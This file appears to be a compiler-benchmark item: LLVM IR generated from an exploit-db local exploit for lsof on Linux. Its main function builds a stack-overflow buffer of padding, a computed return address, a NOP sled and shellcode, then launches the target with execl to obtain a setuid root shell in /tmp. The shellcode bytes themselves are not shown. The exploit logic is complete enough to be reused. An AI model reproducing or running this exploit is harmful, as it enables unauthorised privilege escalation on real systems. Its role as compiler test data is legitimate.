; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19373.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19373.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [29 x i8] c"SDI-lsof exploiting at 0x%x\0A\00", align 1
@shellcode = common dso_local global i8* null, align 8
@.str.1 = private unnamed_addr constant [35 x i8] c"\0AFind a suid shell at /tmp/sh...\0A\0A\00", align 1
@PATH = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [3 x i8] c"-u\00", align 1
@.str.3 = private unnamed_addr constant [6 x i8] c"execl\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca [220 x i8], align 16
  %7 = alloca i64, align 8
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 380, i32* %10, align 4
  %11 = load i32, i32* %4, align 4
  %12 = icmp sgt i32 %11, 1
  br i1 %12, label %13, label %18

13:                                               ; preds = %2
  %14 = load i8**, i8*** %5, align 8
  %15 = getelementptr inbounds i8*, i8** %14, i64 1
  %16 = load i8*, i8** %15, align 8
  %17 = call i32 @atoi(i8* %16)
  store i32 %17, i32* %10, align 4
  br label %18

18:                                               ; preds = %13, %2
  store i32 0, i32* %8, align 4
  br label %19

19:                                               ; preds = %26, %18
  %20 = load i32, i32* %8, align 4
  %21 = icmp slt i32 %20, 16
  br i1 %21, label %22, label %29

22:                                               ; preds = %19
  %23 = load i32, i32* %8, align 4
  %24 = sext i32 %23 to i64
  %25 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %24
  store i8 65, i8* %25, align 1
  br label %26

26:                                               ; preds = %22
  %27 = load i32, i32* %8, align 4
  %28 = add nsw i32 %27, 1
  store i32 %28, i32* %8, align 4
  br label %19

29:                                               ; preds = %19
  %30 = call i32 (...) @getsp()
  %31 = load i32, i32* %10, align 4
  %32 = add nsw i32 %30, %31
  %33 = sext i32 %32 to i64
  store i64 %33, i64* %7, align 8
  %34 = load i64, i64* %7, align 8
  %35 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str, i64 0, i64 0), i64 %34)
  %36 = load i64, i64* %7, align 8
  %37 = and i64 %36, 255
  %38 = trunc i64 %37 to i8
  %39 = load i32, i32* %8, align 4
  %40 = add nsw i32 %39, 1
  store i32 %40, i32* %8, align 4
  %41 = sext i32 %39 to i64
  %42 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %41
  store i8 %38, i8* %42, align 1
  %43 = load i64, i64* %7, align 8
  %44 = and i64 %43, 65280
  %45 = ashr i64 %44, 8
  %46 = trunc i64 %45 to i8
  %47 = load i32, i32* %8, align 4
  %48 = add nsw i32 %47, 1
  store i32 %48, i32* %8, align 4
  %49 = sext i32 %47 to i64
  %50 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %49
  store i8 %46, i8* %50, align 1
  %51 = load i64, i64* %7, align 8
  %52 = and i64 %51, 16711680
  %53 = ashr i64 %52, 16
  %54 = trunc i64 %53 to i8
  %55 = load i32, i32* %8, align 4
  %56 = add nsw i32 %55, 1
  store i32 %56, i32* %8, align 4
  %57 = sext i32 %55 to i64
  %58 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %57
  store i8 %54, i8* %58, align 1
  %59 = load i64, i64* %7, align 8
  %60 = and i64 %59, 4278190080
  %61 = ashr i64 %60, 24
  %62 = trunc i64 %61 to i8
  %63 = load i32, i32* %8, align 4
  %64 = add nsw i32 %63, 1
  store i32 %64, i32* %8, align 4
  %65 = sext i32 %63 to i64
  %66 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %65
  store i8 %62, i8* %66, align 1
  br label %67

67:                                               ; preds = %74, %29
  %68 = load i32, i32* %8, align 4
  %69 = icmp slt i32 %68, 100
  br i1 %69, label %70, label %77

70:                                               ; preds = %67
  %71 = load i32, i32* %8, align 4
  %72 = sext i32 %71 to i64
  %73 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %72
  store i8 -112, i8* %73, align 1
  br label %74

74:                                               ; preds = %70
  %75 = load i32, i32* %8, align 4
  %76 = add nsw i32 %75, 1
  store i32 %76, i32* %8, align 4
  br label %67

77:                                               ; preds = %67
  store i32 0, i32* %9, align 4
  br label %78

78:                                               ; preds = %93, %77
  %79 = load i32, i32* %9, align 4
  %80 = sext i32 %79 to i64
  %81 = load i8*, i8** @shellcode, align 8
  %82 = call i64 @strlen(i8* %81)
  %83 = icmp ult i64 %80, %82
  br i1 %83, label %84, label %98

84:                                               ; preds = %78
  %85 = load i8*, i8** @shellcode, align 8
  %86 = load i32, i32* %9, align 4
  %87 = sext i32 %86 to i64
  %88 = getelementptr inbounds i8, i8* %85, i64 %87
  %89 = load i8, i8* %88, align 1
  %90 = load i32, i32* %8, align 4
  %91 = sext i32 %90 to i64
  %92 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %91
  store i8 %89, i8* %92, align 1
  br label %93

93:                                               ; preds = %84
  %94 = load i32, i32* %9, align 4
  %95 = add nsw i32 %94, 1
  store i32 %95, i32* %9, align 4
  %96 = load i32, i32* %8, align 4
  %97 = add nsw i32 %96, 1
  store i32 %97, i32* %8, align 4
  br label %78

98:                                               ; preds = %78
  %99 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 0
  %100 = call i64 @strlen(i8* %99)
  %101 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 %100
  store i8 0, i8* %101, align 1
  %102 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str.1, i64 0, i64 0))
  %103 = load i32, i32* @PATH, align 4
  %104 = load i32, i32* @PATH, align 4
  %105 = getelementptr inbounds [220 x i8], [220 x i8]* %6, i64 0, i64 0
  %106 = call i32 @execl(i32 %103, i32 %104, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.2, i64 0, i64 0), i8* %105, i8* null)
  %107 = call i32 @perror(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.3, i64 0, i64 0))
  %108 = load i32, i32* %3, align 4
  ret i32 %108
}

declare dso_local i32 @atoi(i8*) #1

declare dso_local i32 @getsp(...) #1

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i64 @strlen(i8*) #1

declare dso_local i32 @execl(i32, i32, i8*, i8*, i8*) #1

declare dso_local i32 @perror(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
